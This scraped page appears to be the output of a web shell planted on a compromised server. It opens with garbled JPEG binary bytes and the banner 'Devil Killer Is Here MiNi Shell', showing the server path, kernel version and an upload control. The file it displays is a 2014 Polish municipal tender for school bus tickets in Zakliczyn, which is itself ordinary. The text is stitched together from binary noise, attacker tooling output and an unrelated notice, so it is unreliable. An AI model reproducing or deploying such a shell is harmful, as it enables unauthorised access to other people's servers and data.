JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140715/153691-N-2014.html

<p class="kh_header"><b>Zakliczyn: Zakup biletów miesięcznych dla uczniów dojeżdżających do szkół podstawowych i gimnazjów na terenie gminy Zakliczyn oraz uczniów niepełnosprawnych z terenu gminy Zakliczyn dojeżdżających  do odpowiednich placówek w roku szkolnym 2014/2015 i  2015/2016</b><br>
<b>Numer ogłoszenia: 153691 - 2014; data zamieszczenia: 15.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zespół Obsługi Szkół i Przedszkoli w Zakliczynie , Rynek 32, 32-840 Zakliczyn, woj. małopolskie, tel. 14 632 64 52, faks 14 632 64 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakliczyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup biletów miesięcznych dla uczniów dojeżdżających do szkół podstawowych i gimnazjów na terenie gminy Zakliczyn oraz uczniów niepełnosprawnych z terenu gminy Zakliczyn dojeżdżających  do odpowiednich placówek w roku szkolnym 2014/2015 i  2015/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zakup biletów miesięcznych  zgodnie art.5 ust. 1 ustawy z 20 czerwca 1992 r. ( tekst jedn. Dz. U. 2012 poz. 1138 ) o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego dla uczniów z terenu gminy Zakliczyn dojeżdżających do odpowiednich placówek oświatowych środkami komunikacji publicznej realizowanymi w ramach linii regularnych - publicznych w okresach:od 01.09.2014 r. do 26.06.2015 r. oraz od 1.09.2015 r. do  26.06.2016 r.
w dni  nauki szkolnej przewidziane w  Rozporządzeniu Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002r. (Dz. U. 2002 Nr 46, poz 432 z późn. zm.) 2.Placówki, do których uczęszczają uczniowie, dla których przewidziano zakup biletów: na terenie gminy Zakliczyn:a) Zespół Szkoły Podstawowej i Gimnazjum w Zakliczynie ul. J. Malczewskiego 56 oraz Rynek 15, 32-840 Zakliczyn;b)  Zespół Szkolno-Przedszkolny w Paleśnicy, Paleśnica 115, 32-842 Paleśnica;c) Zespół Szkoły Podstawowej i Przedszkola w Filipowicach, Filipowice 125, 32-840 Zakliczyn. d) Publiczna Szkoła Podstawowa w Faściszowej, Faściszowa 126 oraz poza gminą Zakliczyn: a) Specjalny Ośrodek Szkolno-Wychowawczy w Zbylitowskiej Górze, Ul. Zbylitowskich 95, 33-113 Zgłobice, powiat tarnowski; b) Zespół Szkół Specjalnych dla Niesłyszących i Słabo Słyszących w Tarnowie, ul. Lippóczyego 4a;c) Specjalny Ośrodek Szkolno Wychowawczy w Tarnowie, ul. Romanowicza 9; 3. Zamawiający wymaga, aby przewozy dzieci i młodzieży szkolnej realizowane były na trasach komunikacyjnych wg rozkładu skorelowanego z godzinami rozpoczynania i zakończenia zajęć lekcyjnych wynikającymi z planów lekcji obowiązujących w roku szkolnym 2014/15 oraz w roku 2015/2016 spełniającym szczegółowe wymagania określone oddzielnie dla każdej części zamówienia. 4. Zamawiający wymaga, aby ww rozkłady jazdy na liniach komunikacyjnych w obrębie gminy Zakliczyn były tak skonstruowane, aby umożliwiały uczniom także transport na i z uroczystości szkolnych (m.in. rozpoczęcie i zakończenie roku szkolnego, rekolekcje, egzaminy, konkursy, zawody sportowe itp.)5. Szacunkowa  łączna ilość biletów dla dowożonych uczniów wynosi  na dzień sporządzenia SIWZ ok. 510 z podziałem na części. Zamawiający zastrzega, iż liczba nabywanych biletów może ulec zmianie. 6. Zamawiający wymaga, aby przewozy dokonywane były środkami transportu spełniającymi wymagania techniczne określone w przepisach ustawy Prawo o ruchu drogowym i innych przepisach związanych z przewozem zbiorowym osób oraz wymagania bezpieczeństwa i higieny wynikające z wieku przewożonych uczniów (od 5 do 16 lat).   Wykonawca zobowiązany jest do przestrzegania przepisów określonych w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 roku w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia ( Dz. U. z 2003 r. Nr 32,poz. 262 ). 7. Wykonawca zobowiązuje się celem zapewnienia bezpieczeństwa w czasie przejazdu zapewnić zatrudnienie  w każdym autobusie, oprócz kierowcy, osoby dorosłej sprawującej nadzór nad bezpieczeństwem i przestrzeganiem regulaminu przewozu pasażerów. 8. Ww. osoby mają za zadanie zapoznać uczniów z regulaminem korzystania z komunikacji publicznej, zachowania niezgodne z regulaminem i zagrażające bezpieczeństwu zgłaszać do dyrektora szkoły lub dyrektora GZOSiP, dopilnować porządku i pomocy ( jeśli jest taka potrzeba) w czasie wsiadania i wysiadania, dopilnować aby najmłodsze dzieci siedziały, w przypadku awarii autobusu lub wypadku  zapewnić uczniom bezpieczeństwo do czasu przyjazdu autobusu zastępczego. 9. Zamawiający wymaga informacji o godzinach odjazdu na przystankach..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 5 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.45.90.00-2, 60.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 20.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże się posiadaniem aktualnej na czas trwania zamówienia licencji na wykonywanie krajowego transportu drogowego osób wydaną na podstawie Ustawy z dnia 6 września 2001 roku o transporcie drogowym. Warunek posiadania uprawnień musi spełniać każdy z podmiotów występujących wspólnie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnieni warunku poprzez złożenie oświadczenia (zał. nr 2)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący potencjału  technicznego, jeżeli wykaże, że dysponuje lub będzie dysponował następującymi pojazdami:
- Min. 2 autobusy na  min. 50 miejsc siedzących- dotyczy części trzeciej 
- Min. 2 pojazdy na  min. 30 miejsc siedzących- dotyczy części czwartej
- pojazdy o odpowiedniej ilości miejsc siedzących do wielkości zamówienia- dotyczy pozostałych części</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnieni warunku poprzez złożenie oświadczenia (zał. nr 2)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca posiada ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na łączną kwotę równą co najmniej 500 000,00 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian umowy w następującym zakresie i na określonych poniżej warunkach: 
1) zmiany urzędowe stawki VAT
2) zmian regulacji prawnych obowiązujących w dniu zawarcia umowy, 
3) w szczególnie uzasadnionym przypadku wystąpienia konieczności realizacji przez podwykonawcę części zamówienia, której wykonawca nie wskazał w ofercie, że powierzy ją do wykonania podwykonawcy, za zgodą Zamawiającego i z zachowaniem zasad dotyczących podwykonawców określonych we wzorze umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zakliczyn.pl/przetargi/2014/przetarg_18.zip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Obsługi Szkół i Przedszkoli w Zakliczynie
32-840 Zakliczyn, Rynek 32,
Tel. 14/ 632-64-52,  fax 14 6326455.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2014 godzina 10:00, miejsce: Urząd Miejski w Zakliczynie, Rynek 32, 32-840 Zakliczyn, pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup biletów miesięcznych ulgowych dla uczniów dojeżdżających do Zespołu Szkoły Podstawowej i Gimnazjum w Zakliczynie z miejscowości na trasie Gwoździec -Zawada Lanckorońska- Zakliczyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość 48  uczniów korzystających z przystanków:
- Gwoździec  - 35  (z przystanków: Gwoździec Gaj, Gwoździec, Gwoździec GS, Gwoździec skrzyżowanie, Gwoździec Granica), Zawada Lanckorońska  - 13 (z przystanku Zawada Lanckorońska)
Rozkład jazdy ma zapewniać w dniach nauki szkolnej dowóz uczniów do budynków szkolnych w Zakliczynie przy ul. Malczewskiego 56 i Rynek 15 na 15 minut przed rozpoczęciem lekcji  tj. na godzinę 7:45 i 7:55 (z Zawady Lanckorońskiej) oraz odwóz do miejsca zamieszkania ok. godz. 13:20, 14:20, 15:10. Szczegółowy wykaz uczniów  z podziałem na poszczególne przystanki Zamawiający przekaże Wykonawcy do dnia 31 sierpnia 2014 roku  oraz do 31 sierpnia 2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.90.00-2, 60.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup  biletów miesięcznych ulgowych dla uczniów dojeżdżających do Zespołu  Szkoły Podstawowej i Gimnazjum w Zakliczynie z miejscowości  na trasie Janowice- Wróblowice - Zakliczyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość 41 uczniów korzystających z przystanków:
Wróblowice - 22   (z przystanków: Wróblowice Remiza, Wróblowice Most),
Janowice -  19   (z przystanków: Janowice - Granica ( wyciąg), Janowice - Bigosówka, Janowice, Janowice - Szkoła, Janowice - Dolna Wieś).
Rozkład jazdy ma zapewniać w dniach nauki szkolnej uczniom dojazd do placówki (na przystanek Zakliczyn Gimnazjum ) na 15 minut przed rozpoczęciem lekcji  tj. na godzinę 7:45 oraz odwóz do miejsca zamieszkania ok. godz. 14:30 i 15:10. Szczegółowy wykaz uczniów z podziałem na poszczególne trasy wraz z godziną ich dowozu i odwozu Zamawiający przekaże Wykonawcy do dnia 31 sierpnia 2014 roku  oraz do 31 sierpnia 2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.90.00-2, 60.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup biletów miesięcznych ulgowych dla uczniów z miejscowości  Bieśnik, Faściszowa, Lusławice, Słona, Stróże, Wesołów, Wola Stróska, Zakliczyn, Zdonia dojeżdżających do Zespołu Szkoły Podstawowej i Gimnazjum w Zakliczynie oraz do SP Faściszowa na trasach obejmujących ww.  miejscowości..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość 266  uczniów korzystających z przystanków:
Bieśnik - 48 (z przystanków : Bieśnik, Bieśnik Granica), Słona -  31 ( z przystanków: Słona Rozlewnia, Słona), Wesołów - 40 , Stróże - 17 ( z przystanków: Stróże,  Stróże szkoła)
Wola Stróska - 11, Zdonia - 24 ( z przystanku: Zdonia  Kuźnia), Lusławice -  34 (z przystanków: Lusławice skrzyżowanie (Pyrek), Lwowska), Faściszowa - 26 ( z przystanków: Faściszowa (DW980), Faściszowa I , Faściszowa (droga do Brzozowej), Faściszowa szkoła)
Zakliczyn  ul. Grabina - 7  i  ul. Ruchu Oporu- 6
Uczniowie SP Faściszowa z miejscowości Lusławice , Faściszowa i Brzozowa  - 22 .
Rozkład jazdy ma zapewniać w dniach nauki szkolnej uczniom dojazd do placówki minimum na 10 minut przed rozpoczęciem lekcji ( 7.50)  oraz odwóz do miejsca zamieszkania ok. godz. 13:30, 14:30 i 15:10. Szczegółowy wykaz uczniów z podziałem na poszczególne przystanki na trasie Zamawiający przekaże Wykonawcy do dnia 31 sierpnia 2014 roku  oraz do 31 sierpnia 2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.90.00-2, 60.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup biletów miesięcznych ulgowych  dla uczniów dojeżdżających do ZS-P w Paleśnicy (przystanek Paleśnica Szkoła) oraz  do  ZSPiP w Filipowicach (przystanek Filipowice Szkoła)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość 145  uczniów korzystających z przystanków:
Zdonia -1 ,  Stróże- 4 , Filipowice - 18  (z przystanków: Filipowice, Filipowice-Potoki), Ruda Kameralna - 8 , Borowa - 13 , Olszowa - 10 , Jamna -  8 (z przystanku Jamna I i Jamna II)
Paleśnica Granica - 20  z przystanku Paleśnica Granica (z miejscowością Bujne), Dzierżaniny -41, (w tym   z przystanku Dzierżaniny Szkoła- 19)
Przewidywana ilość 22 uczniów do   ZSPiP Filipowice  :Ruda Kameralna -  22 bilety (z przystanku Ruda Kameralna)
Godziny dowozu i odwozu zgodne z obowiązującym uczniów  planem lekcji, tj. dla:
-  ZS-P Paleśnica dowóz w godzinach 7:00-8:15, a odwóz ok. 13:20 i 14:20,
-  ZSPiP Filipowice dowóz na godzinę 8:00- 8:20, a odwóz ok. godziny 14:00.
Szczegółowy wykaz uczniów z podziałem na poszczególne trasy  Zamawiający przekaże Wykonawcy do dnia 31 sierpnia 2014 roku  oraz do 31 sierpnia 2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.90.00-2, 60.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup biletów miesięcznych ulgowych dla uczniów niepełnosprawnych dojeżdżających do placówek w Tarnowie i Zbylitowskiej Górze.</p>
